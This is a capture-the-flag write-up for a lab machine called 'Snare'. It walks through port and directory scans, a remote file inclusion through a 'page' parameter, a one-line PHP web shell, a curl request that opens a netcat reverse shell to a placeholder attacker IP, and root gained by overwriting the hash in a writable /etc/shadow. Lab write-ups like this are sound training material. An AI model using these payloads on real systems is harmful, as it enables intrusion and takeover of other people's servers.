Snare
Snare was a easy level box , where we leveraged a RFI to get a foothold in the system then after enumeration we found out , we had write access on a critical system file m by overwriting it , we got to root.
Initial Enumeration.
Nmap Result.
1
2
3
4
5
$ nmap -vvv -p 22,80 -4 -sV -oN nmap 10.150.150.18
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We see the following Ports Open :-
- Port
22is runningOpenSSH 8.2p1 - port
80is runningapache 2.4.41
From the Nmap scan we get to know that the Target server is running Ubuntu.
PORT 80
I ran a basic Directory Busting scan on this port through gobsuter , which gave the following results.
1
2
3
4
5
6
7
8
9
$ gobuster dir -u http://10.150.150.18/ -w ~/HackStuff/wordlists/SecLists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-medium.txt -x php,html,txt -o gobuser.log -t 30
...[SNIP]...
/index.php (Status: 302) [Size: 953] [--> /index.php?page=home]
/.html (Status: 403) [Size: 278]
/.php (Status: 403) [Size: 278]
/about.php (Status: 200) [Size: 996]
/contact.php (Status: 200) [Size: 941]
/home.php (Status: 200) [Size: 946]
/includes (Status: 301) [Size: 317] [--> http://10.150.150.18/includes/]
Upon Visiting the webpage , we see a couple of things. 
- The content on the
webpageis not useful justlorem Ipsum - when i click the different tabs like
home,about us,contactthe parameterpageon theurlchanges.
so there is a possible lfi/rfi in that parameter , lets check the /includes directory.
most of them were empty or useless , like design-top.php only returns the heading.
Getting FootHold
i tried some lfi payloads , and fuzzed with lfi-jhaddix.txt but it didn’t worked , so i noticed the url dosen’t uses .php extension like for contact.php it uses ?page=contact so maybe the application is appending the .php extension , so lets verify it by using the help of /includes.
the above payload dosen’t work , but when i remove the .php extension.
so LFI is confirm , but we cant fully leverage this , to leverage this , we have to find some kind of way to do RFI to host our custom php file, so i host a file in my local machine , and send a request to url like this.
http://10.150.150.18/index.php?page=http://ATTACKERIP:9000/test
1
2
3
➜ 10.150.150.18 echo test > test.php
➜ 10.150.150.18 python3 -m http.server 9000
Serving HTTP on 0.0.0.0 port 9000 (http://0.0.0.0:9000/) ...
and it got included in the source code !
so to get a shell , i just hosted this simple webshell.
1
2
3
➜ 10.150.150.18 /bin/cat simple-web-shell.php
<?=`$_GET[0]`?>
➜ 10.150.150.18
and sent this request through caido/Burp.
- for
cURLit would look like this.1
curl -k $'http://10.150.150.18/index.php?0=busybox+nc+ATTACKERIP+4444+-e+bash&page=http://ATTACKERIP:9000/simple-web-shell'
Prevesc
Www-data to root
- First we will take our
FLAG-1.txt
1
2
3
(remote) www-data@snare:/var/www/html$ wc -c /home/snare/FLAG1.txt
41 /home/snare/FLAG1.txt
(remote) www-data@snare:/var/www/html$
then i upload
lse.shand ran it.
Voila !
/etc/shadowis writable by us ! getting root will be very easy , first we will generate a custom password forroot.
1
2
3
➜ 10.150.150.18 mkpasswd -m sha-512 toor
$6$BJ.kkMHkFyWO5ZWY$v50PydIPTgJ.CQfJrX8hnkHp8dyaqlvn.brWxBlwJa28LrElXwBYEly2Mbd/n70WO291loSufYSIdCLqkuUNk1
➜ 10.150.150.18
- and we will edit
/etc/shadowand replace the original root hash with thishashin root’s place , and we will justsu rootand entertoorand we will getroot.
1
2
3
4
5
(remote) www-data@snare:/tmp$ su root
Password:
root@snare:/tmp# wc -c /root/FLAG2.txt
41 /root/FLAG2.txt
root@snare:/tmp#